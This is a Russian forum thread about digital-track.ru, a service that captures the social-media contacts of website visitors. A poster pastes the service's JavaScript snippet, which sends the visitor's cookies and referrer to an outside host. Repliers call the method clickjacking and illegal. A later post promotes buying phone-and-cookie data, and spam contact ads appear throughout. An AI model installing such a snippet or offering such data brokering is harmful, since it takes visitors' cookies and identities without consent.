Кто нибудь юзал digital-track.ru

Автор chipovec, 29-12-2017, 10:51:13

« назад - далее »

chipovecTopic starter

Всем привет! Это не реклама данного сервиса, а уточнение касающееся установки кода по захвату контактов потенциальных клиентов в соцсетях, причем сервис уверяет что все законно с точки зрения ПСов, в частности не попадают сайты под кликджекинг!
Кто нибудь тестил? :police:
Все о женском и мужском yasen.su
  •  


Владимир75

Это по сути спам, сейчас и на телефон многим звонят и предлагают кредиты, я здесь 27 телефонов Совкомбанка в чёрный список поставил в течении недели(может конечно, не все его, просто регион был один у всех), так вот не навязчивые звонки по телефону в разы эффективнее, чем Рассылка по контактам, поэтому что они там обещают 30лидов из 100 контактов, это враньё. Вот если бы о6и прям сразу Лиды продавали...
Услуги: Сайты в топ за две неделм Мобильный, WatsApp., Viber +79964788889, telegram @xiceer.
  •  


chipovecTopic starter

А сам код под кликджекинг может попасть?
<!-- Pixel -->
<script type="text/javascript">
    (function (d, w) {
        var n = d.getElementsByTagName("script")[0],
            s = d.createElement("script"),
            f = function () { n.parentNode.insertBefore(s, n); };
                s.type = "text/javascript";
                s.async = true;
                s.src = "https://qoopler.ru/index.php?ref="+d.referrer+"&cookie=" + encodeURIComponent(document.cookie);

                if (w.opera == "[object Opera]") {
                    d.addEventListener("DOMContentLoaded", f, false);
                } else { f(); }
    })(document, window);
</script>
<!-- /Pixel -->
Все о женском и мужском yasen.su
  •  

[Константин]

Кликджекинг, забанят в Яндексе. Любые скрипты, которые будут тащить личные данные пользователя — нелегальны.
  •  

#vikup34

#4
зашел на digital-track.ru. читал 10 секунд, после чего меня перекинуло на страницу их приложения в контакте (я там залогинен, и конечно же их приложение увидело мой ВК профиль) После чего меня тут же вернуло обратно.

Я пробовал сделать такое во фреймах, и что-то помнится не получалось. Добывать контакты, явно перекидывая пользователя на VK.com и обратно, да еще и платить за такое аж 50-100 рублей... Это какую прибыльность надо иметь, чтобы за пользователя-отказника столько платить?

Про палевность такого метода я вообще молчу. То, что в данном случае меня действительно раздражает - цена. Они офигели за такое такую цену ставить.
20 рублей было бы - еще ладно. Но 50-100! Да я за бесплатно могу настроить, чтобы на ловушку для гостей в VK в новой вкладке кидало! И любой может. Бред.

Тем более за 50-100 р проще через контекст 10 новых клиентов купить, чем одного отказника пытаться вернуть. Чтобы было выгодно с ними работать, это нужно чтобы контекстный переход стоил рублей под 200


chipovecTopic starter

Друзья! Всем спасибо!  8) и каждому персональное спасибо лично от меня)
Все о женском и мужском yasen.su
  •  

Evg82

Для всех кто попадет на этот форум,  ища ответ на вопрос, что за код  такой, сообщаю.

Работает связка  куки+бигдата.
Телефоны с кукой давно в базах продаются.
А теперь сами подумайте, как круто иметь доступ к таким данным.

Сами подумайте, что стоить это дешево не может. Следовательно компания покупает по оптовой цене, а предлагает по розничной.

Какая оптовая- секрет. Но меньше 80 руб. за телефон можно получить.

У кого остались вопросы- пишите
  •  

Evg82

Цитата: Evg82 от 31-07-2019, 20:56:57
Для всех кто попадет на этот форум,  ища ответ на вопрос, что за код  такой, сообщаю.

Работает связка  куки+бигдата.
Телефоны с кукой давно в базах продаются.
А теперь сами подумайте, как круто иметь доступ к таким данным.

Сами подумайте, что стоить это дешево не может. Следовательно компания покупает по оптовой цене, а предлагает по розничной.

Какая оптовая- секрет. Но меньше 80 руб. за телефон можно получить.

смотрите наш новый сайт https://digitaltrack.tech



У кого остались вопросы- пишите
  •